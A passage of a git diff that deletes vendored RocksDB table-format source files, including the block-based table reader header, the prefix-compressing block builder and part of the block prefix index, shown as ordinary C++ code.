-  for (size_t i = 0; i < str_value.size(); i++) {
-    res_value.append(&str_value[i], 1);
-    res_value.append(1, cspace);
-  }
-
-  out_file->Append("  ASCII  ");
-  out_file->Append(res_key.c_str());
-  out_file->Append(": ");
-  out_file->Append(res_value.c_str());
-  out_file->Append("\n  ------\n");
-}
-
-namespace {
-
-void DeleteCachedFilterEntry(const Slice& key, void* value) {
-  FilterBlockReader* filter = reinterpret_cast<FilterBlockReader*>(value);
-  if (filter->statistics() != nullptr) {
-    RecordTick(filter->statistics(), BLOCK_CACHE_FILTER_BYTES_EVICT,
-               filter->size());
-  }
-  delete filter;
-}
-
-void DeleteCachedIndexEntry(const Slice& key, void* value) {
-  IndexReader* index_reader = reinterpret_cast<IndexReader*>(value);
-  if (index_reader->statistics() != nullptr) {
-    RecordTick(index_reader->statistics(), BLOCK_CACHE_INDEX_BYTES_EVICT,
-               index_reader->usable_size());
-  }
-  delete index_reader;
-}
-
-}  // anonymous namespace
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/block_based_table_reader.h b/thirdparty/rocksdb/table/block_based_table_reader.h
deleted file mode 100644
index a5426cd..0000000
--- a/thirdparty/rocksdb/table/block_based_table_reader.h
+++ /dev/null
@@ -1,486 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#include <stdint.h>
-#include <memory>
-#include <set>
-#include <string>
-#include <utility>
-#include <vector>
-
-#include "options/cf_options.h"
-#include "rocksdb/options.h"
-#include "rocksdb/persistent_cache.h"
-#include "rocksdb/statistics.h"
-#include "rocksdb/status.h"
-#include "rocksdb/table.h"
-#include "table/filter_block.h"
-#include "table/format.h"
-#include "table/persistent_cache_helper.h"
-#include "table/table_properties_internal.h"
-#include "table/table_reader.h"
-#include "table/two_level_iterator.h"
-#include "util/coding.h"
-#include "util/file_reader_writer.h"
-
-namespace rocksdb {
-
-class Block;
-class BlockIter;
-class BlockHandle;
-class Cache;
-class FilterBlockReader;
-class BlockBasedFilterBlockReader;
-class FullFilterBlockReader;
-class Footer;
-class InternalKeyComparator;
-class Iterator;
-class RandomAccessFile;
-class TableCache;
-class TableReader;
-class WritableFile;
-struct BlockBasedTableOptions;
-struct EnvOptions;
-struct ReadOptions;
-class GetContext;
-class InternalIterator;
-
-using std::unique_ptr;
-
-typedef std::vector<std::pair<std::string, std::string>> KVPairBlock;
-
-// A Table is a sorted map from strings to strings.  Tables are
-// immutable and persistent.  A Table may be safely accessed from
-// multiple threads without external synchronization.
-class BlockBasedTable : public TableReader {
- public:
-  static const std::string kFilterBlockPrefix;
-  static const std::string kFullFilterBlockPrefix;
-  static const std::string kPartitionedFilterBlockPrefix;
-  // The longest prefix of the cache key used to identify blocks.
-  // For Posix files the unique ID is three varints.
-  static const size_t kMaxCacheKeyPrefixSize = kMaxVarint64Length * 3 + 1;
-
-  // Attempt to open the table that is stored in bytes [0..file_size)
-  // of "file", and read the metadata entries necessary to allow
-  // retrieving data from the table.
-  //
-  // If successful, returns ok and sets "*table_reader" to the newly opened
-  // table.  The client should delete "*table_reader" when no longer needed.
-  // If there was an error while initializing the table, sets "*table_reader"
-  // to nullptr and returns a non-ok status.
-  //
-  // @param file must remain live while this Table is in use.
-  // @param prefetch_index_and_filter_in_cache can be used to disable
-  // prefetching of
-  //    index and filter blocks into block cache at startup
-  // @param skip_filters Disables loading/accessing the filter block. Overrides
-  //    prefetch_index_and_filter_in_cache, so filter will be skipped if both
-  //    are set.
-  static Status Open(const ImmutableCFOptions& ioptions,
-                     const EnvOptions& env_options,
-                     const BlockBasedTableOptions& table_options,
-                     const InternalKeyComparator& internal_key_comparator,
-                     unique_ptr<RandomAccessFileReader>&& file,
-                     uint64_t file_size, unique_ptr<TableReader>* table_reader,
-                     bool prefetch_index_and_filter_in_cache = true,
-                     bool skip_filters = false, int level = -1);
-
-  bool PrefixMayMatch(const Slice& internal_key);
-
-  // Returns a new iterator over the table contents.
-  // The result of NewIterator() is initially invalid (caller must
-  // call one of the Seek methods on the iterator before using it).
-  // @param skip_filters Disables loading/accessing the filter block
-  InternalIterator* NewIterator(
-      const ReadOptions&, Arena* arena = nullptr,
-      bool skip_filters = false) override;
-
-  InternalIterator* NewRangeTombstoneIterator(
-      const ReadOptions& read_options) override;
-
-  // @param skip_filters Disables loading/accessing the filter block
-  Status Get(const ReadOptions& readOptions, const Slice& key,
-             GetContext* get_context, bool skip_filters = false) override;
-
-  // Pre-fetch the disk blocks that correspond to the key range specified by
-  // (kbegin, kend). The call will return error status in the event of
-  // IO or iteration error.
-  Status Prefetch(const Slice* begin, const Slice* end) override;
-
-  // Given a key, return an approximate byte offset in the file where
-  // the data for that key begins (or would begin if the key were
-  // present in the file).  The returned value is in terms of file
-  // bytes, and so includes effects like compression of the underlying data.
-  // E.g., the approximate offset of the last key in the table will
-  // be close to the file length.
-  uint64_t ApproximateOffsetOf(const Slice& key) override;
-
-  // Returns true if the block for the specified key is in cache.
-  // REQUIRES: key is in this table && block cache enabled
-  bool TEST_KeyInCache(const ReadOptions& options, const Slice& key);
-
-  // Set up the table for Compaction. Might change some parameters with
-  // posix_fadvise
-  void SetupForCompaction() override;
-
-  std::shared_ptr<const TableProperties> GetTableProperties() const override;
-
-  size_t ApproximateMemoryUsage() const override;
-
-  // convert SST file to a human readable form
-  Status DumpTable(WritableFile* out_file) override;
-
-  Status VerifyChecksum() override;
-
-  void Close() override;
-
-  ~BlockBasedTable();
-
-  bool TEST_filter_block_preloaded() const;
-  bool TEST_index_reader_preloaded() const;
-
-  // IndexReader is the interface that provide the functionality for index
-  // access.
-  class IndexReader {
-   public:
-    explicit IndexReader(const InternalKeyComparator* icomparator,
-                         Statistics* stats)
-        : icomparator_(icomparator), statistics_(stats) {}
-
-    virtual ~IndexReader() {}
-
-    // Create an iterator for index access.
-    // If iter is null then a new object is created on heap and the callee will
-    // have the ownership. If a non-null iter is passed in it will be used, and
-    // the returned value is either the same as iter or a new on-heap object
-    // that
-    // wrapps the passed iter. In the latter case the return value would point
-    // to
-    // a different object then iter and the callee has the ownership of the
-    // returned object.
-    virtual InternalIterator* NewIterator(BlockIter* iter = nullptr,
-                                          bool total_order_seek = true) = 0;
-
-    // The size of the index.
-    virtual size_t size() const = 0;
-    // Memory usage of the index block
-    virtual size_t usable_size() const = 0;
-    // return the statistics pointer
-    virtual Statistics* statistics() const { return statistics_; }
-    // Report an approximation of how much memory has been used other than
-    // memory
-    // that was allocated in block cache.
-    virtual size_t ApproximateMemoryUsage() const = 0;
-
-    virtual void CacheDependencies(bool /* unused */) {}
-
-    // Prefetch all the blocks referenced by this index to the buffer
-    void PrefetchBlocks(FilePrefetchBuffer* buf);
-
-   protected:
-    const InternalKeyComparator* icomparator_;
-
-   private:
-    Statistics* statistics_;
-  };
-
-  static Slice GetCacheKey(const char* cache_key_prefix,
-                           size_t cache_key_prefix_size,
-                           const BlockHandle& handle, char* cache_key);
-
-  // Retrieve all key value pairs from data blocks in the table.
-  // The key retrieved are internal keys.
-  Status GetKVPairsFromDataBlocks(std::vector<KVPairBlock>* kv_pair_blocks);
-
-  class BlockEntryIteratorState;
-
-  friend class PartitionIndexReader;
-
- protected:
-  template <class TValue>
-  struct CachableEntry;
-  struct Rep;
-  Rep* rep_;
-  explicit BlockBasedTable(Rep* rep) : rep_(rep) {}
-
- private:
-  friend class MockedBlockBasedTable;
-  // input_iter: if it is not null, update this one and return it as Iterator
-  static InternalIterator* NewDataBlockIterator(Rep* rep, const ReadOptions& ro,
-                                                const Slice& index_value,
-                                                BlockIter* input_iter = nullptr,
-                                                bool is_index = false);
-  static InternalIterator* NewDataBlockIterator(Rep* rep, const ReadOptions& ro,
-                                                const BlockHandle& block_hanlde,
-                                                BlockIter* input_iter = nullptr,
-                                                bool is_index = false,
-                                                Status s = Status());
-  // If block cache enabled (compressed or uncompressed), looks for the block
-  // identified by handle in (1) uncompressed cache, (2) compressed cache, and
-  // then (3) file. If found, inserts into the cache(s) that were searched
-  // unsuccessfully (e.g., if found in file, will add to both uncompressed and
-  // compressed caches if they're enabled).
-  //
-  // @param block_entry value is set to the uncompressed block if found. If
-  //    in uncompressed block cache, also sets cache_handle to reference that
-  //    block.
-  static Status MaybeLoadDataBlockToCache(FilePrefetchBuffer* prefetch_buffer,
-                                          Rep* rep, const ReadOptions& ro,
-                                          const BlockHandle& handle,
-                                          Slice compression_dict,
-                                          CachableEntry<Block>* block_entry,
-                                          bool is_index = false);
-
-  // For the following two functions:
-  // if `no_io == true`, we will not try to read filter/index from sst file
-  // were they not present in cache yet.
-  CachableEntry<FilterBlockReader> GetFilter(
-      FilePrefetchBuffer* prefetch_buffer = nullptr, bool no_io = false) const;
-  virtual CachableEntry<FilterBlockReader> GetFilter(
-      FilePrefetchBuffer* prefetch_buffer, const BlockHandle& filter_blk_handle,
-      const bool is_a_filter_partition, bool no_io) const;
-
-  // Get the iterator from the index reader.
-  // If input_iter is not set, return new Iterator
-  // If input_iter is set, update it and return it as Iterator
-  //
-  // Note: ErrorIterator with Status::Incomplete shall be returned if all the
-  // following conditions are met:
-  //  1. We enabled table_options.cache_index_and_filter_blocks.
-  //  2. index is not present in block cache.
-  //  3. We disallowed any io to be performed, that is, read_options ==
-  //     kBlockCacheTier
-  InternalIterator* NewIndexIterator(
-      const ReadOptions& read_options, BlockIter* input_iter = nullptr,
-      CachableEntry<IndexReader>* index_entry = nullptr);
-
-  // Read block cache from block caches (if set): block_cache and
-  // block_cache_compressed.
-  // On success, Status::OK with be returned and @block will be populated with
-  // pointer to the block as well as its block handle.
-  // @param compression_dict Data for presetting the compression library's
-  //    dictionary.
-  static Status GetDataBlockFromCache(
-      const Slice& block_cache_key, const Slice& compressed_block_cache_key,
-      Cache* block_cache, Cache* block_cache_compressed,
-      const ImmutableCFOptions& ioptions, const ReadOptions& read_options,
-      BlockBasedTable::CachableEntry<Block>* block, uint32_t format_version,
-      const Slice& compression_dict, size_t read_amp_bytes_per_bit,
-      bool is_index = false);
-
-  // Put a raw block (maybe compressed) to the corresponding block caches.
-  // This method will perform decompression against raw_block if needed and then
-  // populate the block caches.
-  // On success, Status::OK will be returned; also @block will be populated with
-  // uncompressed block and its cache handle.
-  //
-  // REQUIRES: raw_block is heap-allocated. PutDataBlockToCache() will be
-  // responsible for releasing its memory if error occurs.
-  // @param compression_dict Data for presetting the compression library's
-  //    dictionary.
-  static Status PutDataBlockToCache(
-      const Slice& block_cache_key, const Slice& compressed_block_cache_key,
-      Cache* block_cache, Cache* block_cache_compressed,
-      const ReadOptions& read_options, const ImmutableCFOptions& ioptions,
-      CachableEntry<Block>* block, Block* raw_block, uint32_t format_version,
-      const Slice& compression_dict, size_t read_amp_bytes_per_bit,
-      bool is_index = false, Cache::Priority pri = Cache::Priority::LOW);
-
-  // Calls (*handle_result)(arg, ...) repeatedly, starting with the entry found
-  // after a call to Seek(key), until handle_result returns false.
-  // May not make such a call if filter policy says that key is not present.
-  friend class TableCache;
-  friend class BlockBasedTableBuilder;
-
-  void ReadMeta(const Footer& footer);
-
-  // Create a index reader based on the index type stored in the table.
-  // Optionally, user can pass a preloaded meta_index_iter for the index that
-  // need to access extra meta blocks for index construction. This parameter
-  // helps avoid re-reading meta index block if caller already created one.
-  Status CreateIndexReader(
-      FilePrefetchBuffer* prefetch_buffer, IndexReader** index_reader,
-      InternalIterator* preloaded_meta_index_iter = nullptr,
-      const int level = -1);
-
-  bool FullFilterKeyMayMatch(const ReadOptions& read_options,
-                             FilterBlockReader* filter, const Slice& user_key,
-                             const bool no_io) const;
-
-  // Read the meta block from sst.
-  static Status ReadMetaBlock(Rep* rep, FilePrefetchBuffer* prefetch_buffer,
-                              std::unique_ptr<Block>* meta_block,
-                              std::unique_ptr<InternalIterator>* iter);
-
-  Status VerifyChecksumInBlocks(InternalIterator* index_iter);
-
-  // Create the filter from the filter block.
-  FilterBlockReader* ReadFilter(FilePrefetchBuffer* prefetch_buffer,
-                                const BlockHandle& filter_handle,
-                                const bool is_a_filter_partition) const;
-
-  static void SetupCacheKeyPrefix(Rep* rep, uint64_t file_size);
-
-  // Generate a cache key prefix from the file
-  static void GenerateCachePrefix(Cache* cc,
-    RandomAccessFile* file, char* buffer, size_t* size);
-  static void GenerateCachePrefix(Cache* cc,
-    WritableFile* file, char* buffer, size_t* size);
-
-  // Helper functions for DumpTable()
-  Status DumpIndexBlock(WritableFile* out_file);
-  Status DumpDataBlocks(WritableFile* out_file);
-  void DumpKeyValue(const Slice& key, const Slice& value,
-                    WritableFile* out_file);
-
-  // No copying allowed
-  explicit BlockBasedTable(const TableReader&) = delete;
-  void operator=(const TableReader&) = delete;
-
-  friend class PartitionedFilterBlockReader;
-  friend class PartitionedFilterBlockTest;
-};
-
-// Maitaning state of a two-level iteration on a partitioned index structure
-class BlockBasedTable::BlockEntryIteratorState : public TwoLevelIteratorState {
- public:
-  BlockEntryIteratorState(
-      BlockBasedTable* table, const ReadOptions& read_options,
-      const InternalKeyComparator* icomparator, bool skip_filters,
-      bool is_index = false,
-      std::unordered_map<uint64_t, CachableEntry<Block>>* block_map = nullptr);
-  InternalIterator* NewSecondaryIterator(const Slice& index_value) override;
-  bool PrefixMayMatch(const Slice& internal_key) override;
-  bool KeyReachedUpperBound(const Slice& internal_key) override;
-
- private:
-  // Don't own table_
-  BlockBasedTable* table_;
-  const ReadOptions read_options_;
-  const InternalKeyComparator* icomparator_;
-  bool skip_filters_;
-  // true if the 2nd level iterator is on indexes instead of on user data.
-  bool is_index_;
-  std::unordered_map<uint64_t, CachableEntry<Block>>* block_map_;
-  port::RWMutex cleaner_mu;
-};
-
-// CachableEntry represents the entries that *may* be fetched from block cache.
-//  field `value` is the item we want to get.
-//  field `cache_handle` is the cache handle to the block cache. If the value
-//    was not read from cache, `cache_handle` will be nullptr.
-template <class TValue>
-struct BlockBasedTable::CachableEntry {
-  CachableEntry(TValue* _value, Cache::Handle* _cache_handle)
-      : value(_value), cache_handle(_cache_handle) {}
-  CachableEntry() : CachableEntry(nullptr, nullptr) {}
-  void Release(Cache* cache, bool force_erase = false) {
-    if (cache_handle) {
-      cache->Release(cache_handle, force_erase);
-      value = nullptr;
-      cache_handle = nullptr;
-    }
-  }
-  bool IsSet() const { return cache_handle != nullptr; }
-
-  TValue* value = nullptr;
-  // if the entry is from the cache, cache_handle will be populated.
-  Cache::Handle* cache_handle = nullptr;
-};
-
-struct BlockBasedTable::Rep {
-  Rep(const ImmutableCFOptions& _ioptions, const EnvOptions& _env_options,
-      const BlockBasedTableOptions& _table_opt,
-      const InternalKeyComparator& _internal_comparator, bool skip_filters)
-      : ioptions(_ioptions),
-        env_options(_env_options),
-        table_options(_table_opt),
-        filter_policy(skip_filters ? nullptr : _table_opt.filter_policy.get()),
-        internal_comparator(_internal_comparator),
-        filter_type(FilterType::kNoFilter),
-        whole_key_filtering(_table_opt.whole_key_filtering),
-        prefix_filtering(true),
-        range_del_handle(BlockHandle::NullBlockHandle()),
-        global_seqno(kDisableGlobalSequenceNumber) {}
-
-  const ImmutableCFOptions& ioptions;
-  const EnvOptions& env_options;
-  const BlockBasedTableOptions& table_options;
-  const FilterPolicy* const filter_policy;
-  const InternalKeyComparator& internal_comparator;
-  Status status;
-  unique_ptr<RandomAccessFileReader> file;
-  char cache_key_prefix[kMaxCacheKeyPrefixSize];
-  size_t cache_key_prefix_size = 0;
-  char persistent_cache_key_prefix[kMaxCacheKeyPrefixSize];
-  size_t persistent_cache_key_prefix_size = 0;
-  char compressed_cache_key_prefix[kMaxCacheKeyPrefixSize];
-  size_t compressed_cache_key_prefix_size = 0;
-  uint64_t dummy_index_reader_offset =
-      0;  // ID that is unique for the block cache.
-  PersistentCacheOptions persistent_cache_options;
-
-  // Footer contains the fixed table information
-  Footer footer;
-  // index_reader and filter will be populated and used only when
-  // options.block_cache is nullptr; otherwise we will get the index block via
-  // the block cache.
-  unique_ptr<IndexReader> index_reader;
-  unique_ptr<FilterBlockReader> filter;
-
-  enum class FilterType {
-    kNoFilter,
-    kFullFilter,
-    kBlockFilter,
-    kPartitionedFilter,
-  };
-  FilterType filter_type;
-  BlockHandle filter_handle;
-
-  std::shared_ptr<const TableProperties> table_properties;
-  // Block containing the data for the compression dictionary. We take ownership
-  // for the entire block struct, even though we only use its Slice member. This
-  // is easier because the Slice member depends on the continued existence of
-  // another member ("allocation").
-  std::unique_ptr<const BlockContents> compression_dict_block;
-  BlockBasedTableOptions::IndexType index_type;
-  bool hash_index_allow_collision;
-  bool whole_key_filtering;
-  bool prefix_filtering;
-  // TODO(kailiu) It is very ugly to use internal key in table, since table
-  // module should not be relying on db module. However to make things easier
-  // and compatible with existing code, we introduce a wrapper that allows
-  // block to extract prefix without knowing if a key is internal or not.
-  unique_ptr<SliceTransform> internal_prefix_transform;
-
-  // only used in level 0 files:
-  // when pin_l0_filter_and_index_blocks_in_cache is true, we do use the
-  // LRU cache, but we always keep the filter & idndex block's handle checked
-  // out here (=we don't call Release()), plus the parsed out objects
-  // the LRU cache will never push flush them out, hence they're pinned
-  CachableEntry<FilterBlockReader> filter_entry;
-  CachableEntry<IndexReader> index_entry;
-  // range deletion meta-block is pinned through reader's lifetime when LRU
-  // cache is enabled.
-  CachableEntry<Block> range_del_entry;
-  BlockHandle range_del_handle;
-
-  // If global_seqno is used, all Keys in this file will have the same
-  // seqno with value `global_seqno`.
-  //
-  // A value of kDisableGlobalSequenceNumber means that this feature is disabled
-  // and every key have it's own seqno.
-  SequenceNumber global_seqno;
-  bool closed = false;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/block_builder.cc b/thirdparty/rocksdb/table/block_builder.cc
deleted file mode 100644
index 39bfffe..0000000
--- a/thirdparty/rocksdb/table/block_builder.cc
+++ /dev/null
@@ -1,131 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// BlockBuilder generates blocks where keys are prefix-compressed:
-//
-// When we store a key, we drop the prefix shared with the previous
-// string.  This helps reduce the space requirement significantly.
-// Furthermore, once every K keys, we do not apply the prefix
-// compression and store the entire key.  We call this a "restart
-// point".  The tail end of the block stores the offsets of all of the
-// restart points, and can be used to do a binary search when looking
-// for a particular key.  Values are stored as-is (without compression)
-// immediately following the corresponding key.
-//
-// An entry for a particular key-value pair has the form:
-//     shared_bytes: varint32
-//     unshared_bytes: varint32
-//     value_length: varint32
-//     key_delta: char[unshared_bytes]
-//     value: char[value_length]
-// shared_bytes == 0 for restart points.
-//
-// The trailer of the block has the form:
-//     restarts: uint32[num_restarts]
-//     num_restarts: uint32
-// restarts[i] contains the offset within the block of the ith restart point.
-
-#include "table/block_builder.h"
-
-#include <algorithm>
-#include <assert.h>
-#include "rocksdb/comparator.h"
-#include "db/dbformat.h"
-#include "util/coding.h"
-
-namespace rocksdb {
-
-BlockBuilder::BlockBuilder(int block_restart_interval, bool use_delta_encoding)
-    : block_restart_interval_(block_restart_interval),
-      use_delta_encoding_(use_delta_encoding),
-      restarts_(),
-      counter_(0),
-      finished_(false) {
-  assert(block_restart_interval_ >= 1);
-  restarts_.push_back(0);       // First restart point is at offset 0
-  estimate_ = sizeof(uint32_t) + sizeof(uint32_t);
-}
-
-void BlockBuilder::Reset() {
-  buffer_.clear();
-  restarts_.clear();
-  restarts_.push_back(0);       // First restart point is at offset 0
-  estimate_ = sizeof(uint32_t) + sizeof(uint32_t);
-  counter_ = 0;
-  finished_ = false;
-  last_key_.clear();
-}
-
-size_t BlockBuilder::EstimateSizeAfterKV(const Slice& key, const Slice& value)
-  const {
-  size_t estimate = CurrentSizeEstimate();
-  estimate += key.size() + value.size();
-  if (counter_ >= block_restart_interval_) {
-    estimate += sizeof(uint32_t); // a new restart entry.
-  }
-
-  estimate += sizeof(int32_t); // varint for shared prefix length.
-  estimate += VarintLength(key.size()); // varint for key length.
-  estimate += VarintLength(value.size()); // varint for value length.
-
-  return estimate;
-}
-
-Slice BlockBuilder::Finish() {
-  // Append restart array
-  for (size_t i = 0; i < restarts_.size(); i++) {
-    PutFixed32(&buffer_, restarts_[i]);
-  }
-  PutFixed32(&buffer_, static_cast<uint32_t>(restarts_.size()));
-  finished_ = true;
-  return Slice(buffer_);
-}
-
-void BlockBuilder::Add(const Slice& key, const Slice& value) {
-  assert(!finished_);
-  assert(counter_ <= block_restart_interval_);
-  size_t shared = 0;  // number of bytes shared with prev key
-  if (counter_ >= block_restart_interval_) {
-    // Restart compression
-    restarts_.push_back(static_cast<uint32_t>(buffer_.size()));
-    estimate_ += sizeof(uint32_t);
-    counter_ = 0;
-
-    if (use_delta_encoding_) {
-      // Update state
-      last_key_.assign(key.data(), key.size());
-    }
-  } else if (use_delta_encoding_) {
-    Slice last_key_piece(last_key_);
-    // See how much sharing to do with previous string
-    shared = key.difference_offset(last_key_piece);
-
-    // Update state
-    // We used to just copy the changed data here, but it appears to be
-    // faster to just copy the whole thing.
-    last_key_.assign(key.data(), key.size());
-  }
-
-  const size_t non_shared = key.size() - shared;
-  const size_t curr_size = buffer_.size();
-
-  // Add "<shared><non_shared><value_size>" to buffer_
-  PutVarint32Varint32Varint32(&buffer_, static_cast<uint32_t>(shared),
-                              static_cast<uint32_t>(non_shared),
-                              static_cast<uint32_t>(value.size()));
-
-  // Add string delta to buffer_ followed by value
-  buffer_.append(key.data() + shared, non_shared);
-  buffer_.append(value.data(), value.size());
-
-  counter_++;
-  estimate_ += buffer_.size() - curr_size;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/block_builder.h b/thirdparty/rocksdb/table/block_builder.h
deleted file mode 100644
index 6b5297d..0000000
--- a/thirdparty/rocksdb/table/block_builder.h
+++ /dev/null
@@ -1,62 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#include <vector>
-
-#include <stdint.h>
-#include "rocksdb/slice.h"
-
-namespace rocksdb {
-
-class BlockBuilder {
- public:
-  BlockBuilder(const BlockBuilder&) = delete;
-  void operator=(const BlockBuilder&) = delete;
-
-  explicit BlockBuilder(int block_restart_interval,
-                        bool use_delta_encoding = true);
-
-  // Reset the contents as if the BlockBuilder was just constructed.
-  void Reset();
-
-  // REQUIRES: Finish() has not been called since the last call to Reset().
-  // REQUIRES: key is larger than any previously added key
-  void Add(const Slice& key, const Slice& value);
-
-  // Finish building the block and return a slice that refers to the
-  // block contents.  The returned slice will remain valid for the
-  // lifetime of this builder or until Reset() is called.
-  Slice Finish();
-
-  // Returns an estimate of the current (uncompressed) size of the block
-  // we are building.
-  inline size_t CurrentSizeEstimate() const { return estimate_; }
-
-  // Returns an estimated block size after appending key and value.
-  size_t EstimateSizeAfterKV(const Slice& key, const Slice& value) const;
-
-  // Return true iff no entries have been added since the last Reset()
-  bool empty() const {
-    return buffer_.empty();
-  }
-
- private:
-  const int          block_restart_interval_;
-  const bool         use_delta_encoding_;
-
-  std::string           buffer_;    // Destination buffer
-  std::vector<uint32_t> restarts_;  // Restart points
-  size_t                estimate_;
-  int                   counter_;   // Number of entries emitted since restart
-  bool                  finished_;  // Has Finish() been called?
-  std::string           last_key_;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/block_prefix_index.cc b/thirdparty/rocksdb/table/block_prefix_index.cc
deleted file mode 100644
index df37b5f..0000000
--- a/thirdparty/rocksdb/table/block_prefix_index.cc
+++ /dev/null
@@ -1,237 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "table/block_prefix_index.h"
-
-#include <vector>
-
-#include "rocksdb/comparator.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/slice_transform.h"
-#include "util/arena.h"
-#include "util/coding.h"
-#include "util/hash.h"
-
-namespace rocksdb {
-
-inline uint32_t Hash(const Slice& s) {
-  return rocksdb::Hash(s.data(), s.size(), 0);
-}
-
-inline uint32_t PrefixToBucket(const Slice& prefix, uint32_t num_buckets) {
-  return Hash(prefix) % num_buckets;
-}
-
-// The prefix block index is simply a bucket array, with each entry pointing to
-// the blocks that span the prefixes hashed to this bucket.
-//
-// To reduce memory footprint, if there is only one block per bucket, the entry
-// stores the block id directly. If there are more than one blocks per bucket,
-// because of hash collision or a single prefix spanning multiple blocks,
-// the entry points to an array of block ids. The block array is an array of
-// uint32_t's. The first uint32_t indicates the total number of blocks, followed
-// by the block ids.
-//
-// To differentiate the two cases, the high order bit of the entry indicates
-// whether it is a 'pointer' into a separate block array.
-// 0x7FFFFFFF is reserved for empty bucket.
-
-const uint32_t kNoneBlock = 0x7FFFFFFF;
-const uint32_t kBlockArrayMask = 0x80000000;
-
-inline bool IsNone(uint32_t block_id) {
-  return block_id == kNoneBlock;
-}
-
-inline bool IsBlockId(uint32_t block_id) {
-  return (block_id & kBlockArrayMask) == 0;
-}
-
-inline uint32_t DecodeIndex(uint32_t block_id) {
-  uint32_t index = block_id ^ kBlockArrayMask;
-  assert(index < kBlockArrayMask);
-  return index;
-}
-
-inline uint32_t EncodeIndex(uint32_t index) {
-  assert(index < kBlockArrayMask);
-  return index | kBlockArrayMask;
-}
-
-// temporary storage for prefix information during index building
-struct PrefixRecord {
-  Slice prefix;
-  uint32_t start_block;
-  uint32_t end_block;
-  uint32_t num_blocks;
-  PrefixRecord* next;
-};
-
-class BlockPrefixIndex::Builder {
- public:
-  explicit Builder(const SliceTransform* internal_prefix_extractor)
-      : internal_prefix_extractor_(internal_prefix_extractor) {}
-
-  void Add(const Slice& key_prefix, uint32_t start_block,
-           uint32_t num_blocks) {
-    PrefixRecord* record = reinterpret_cast<PrefixRecord*>(
-      arena_.AllocateAligned(sizeof(PrefixRecord)));
-    record->prefix = key_prefix;
-    record->start_block = start_block;
-    record->end_block = start_block + num_blocks - 1;
-    record->num_blocks = num_blocks;
-    prefixes_.push_back(record);
-  }
-
-  BlockPrefixIndex* Finish() {
-    // For now, use roughly 1:1 prefix to bucket ratio.
-    uint32_t num_buckets = static_cast<uint32_t>(prefixes_.size()) + 1;
-
-    // Collect prefix records that hash to the same bucket, into a single
-    // linklist.
-    std::vector<PrefixRecord*> prefixes_per_bucket(num_buckets, nullptr);
-    std::vector<uint32_t> num_blocks_per_bucket(num_buckets, 0);
-    for (PrefixRecord* current : prefixes_) {
-      uint32_t bucket = PrefixToBucket(current->prefix, num_buckets);
-      // merge the prefix block span if the first block of this prefix is
-      // connected to the last block of the previous prefix.
-      PrefixRecord* prev = prefixes_per_bucket[bucket];
-      if (prev) {
-        assert(current->start_block >= prev->end_block);
-        auto distance = current->start_block - prev->end_block;
-        if (distance <= 1) {
-          prev->end_block = current->end_block;
-          prev->num_blocks = prev->end_block - prev->start_block + 1;
-          num_blocks_per_bucket[bucket] += (current->num_blocks + distance - 1);
-          continue;
-        }
-      }
-      current->next = prev;
-      prefixes_per_bucket[bucket] = current;
-      num_blocks_per_bucket[bucket] += current->num_blocks;
-    }
-
-    // Calculate the block array buffer size
-    uint32_t total_block_array_entries = 0;
-    for (uint32_t i = 0; i < num_buckets; i++) {
-      uint32_t num_blocks = num_blocks_per_bucket[i];
-      if (num_blocks > 1) {
-        total_block_array_entries += (num_blocks + 1);
-      }
-    }
-
-    // Populate the final prefix block index
-    uint32_t* block_array_buffer = new uint32_t[total_block_array_entries];
-    uint32_t* buckets = new uint32_t[num_buckets];
-    uint32_t offset = 0;
-    for (uint32_t i = 0; i < num_buckets; i++) {
-      uint32_t num_blocks = num_blocks_per_bucket[i];
-      if (num_blocks == 0) {
-        assert(prefixes_per_bucket[i] == nullptr);
-        buckets[i] = kNoneBlock;
-      } else if (num_blocks == 1) {
-        assert(prefixes_per_bucket[i] != nullptr);
-        assert(prefixes_per_bucket[i]->next == nullptr);
-        buckets[i] = prefixes_per_bucket[i]->start_block;
-      } else {
-        assert(total_block_array_entries > 0);
-        assert(prefixes_per_bucket[i] != nullptr);
-        buckets[i] = EncodeIndex(offset);
-        block_array_buffer[offset] = num_blocks;
-        uint32_t* last_block = &block_array_buffer[offset + num_blocks];
-        auto current = prefixes_per_bucket[i];
-        // populate block ids from largest to smallest
-        while (current != nullptr) {
-          for (uint32_t iter = 0; iter < current->num_blocks; iter++) {
-            *last_block = current->end_block - iter;
-            last_block--;
-          }
-          current = current->next;
-        }
-        assert(last_block == &block_array_buffer[offset]);
-        offset += (num_blocks + 1);
-      }
-    }
-
-    assert(offset == total_block_array_entries);
-
-    return new BlockPrefixIndex(internal_prefix_extractor_, num_buckets,
-                                buckets, total_block_array_entries,
-                                block_array_buffer);
-  }
-
- private:
-  const SliceTransform* internal_prefix_extractor_;
-
-  std::vector<PrefixRecord*> prefixes_;
-  Arena arena_;
-};
-
-
